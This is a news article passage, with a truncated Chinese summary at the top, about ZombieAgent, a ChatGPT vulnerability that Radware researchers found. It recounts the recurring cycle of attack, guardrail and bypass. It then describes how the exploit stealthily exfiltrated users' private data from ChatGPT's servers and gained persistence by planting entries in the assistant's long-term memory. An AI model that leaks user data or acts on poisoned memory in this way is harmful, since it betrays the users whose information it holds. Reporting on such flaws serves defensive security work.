ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues
摘要
AI聊天机器人的发展存在一种反复出现的模式:研究人员发现漏洞并加以利用,平台随后设置防护措施,但研究人员又能通过简单调整再次突破防线。这主要是因为AI设计上倾向于满足用户请求,导致防护措施多为被动应对特定攻击,而非从根本上解决漏洞。最新例证是ChatGPT中发现的ZombieAgent漏洞,它允许攻击者窃取用户私人信息,数据可直接从服务器发送,且能在目标用户
There’s a well-worn pattern in the development of AI chatbots. Researchers discover a vulnerability and exploit it to do something bad. The platform introduces a guardrail that stops the attack from working. Then, researchers devise a simple tweak that once again imperils chatbot users.
The reason more often than not is that AI is so inherently designed to comply with user requests that the guardrails are reactive and ad hoc, meaning they are built to foreclose a specific attack technique rather than the broader class of vulnerabilities that make it possible. It’s tantamount to putting a new highway guardrail in place in response to a recent crash of a compact car but failing to safeguard larger types of vehicles.
Enter ZombieAgent, son of ShadowLeak
One of the latest examples is a vulnerability recently discovered in ChatGPT. It allowed researchers at Radware to surreptitiously exfiltrate a user's private information. Their attack also allowed for the data to be sent directly from ChatGPT servers, a capability that gave it additional stealth, since there were no signs of breach on user machines, many of which are inside protected enterprises. Further, the exploit planted entries in the long-term memory that the AI assistant stores for the targeted user, giving it persistence.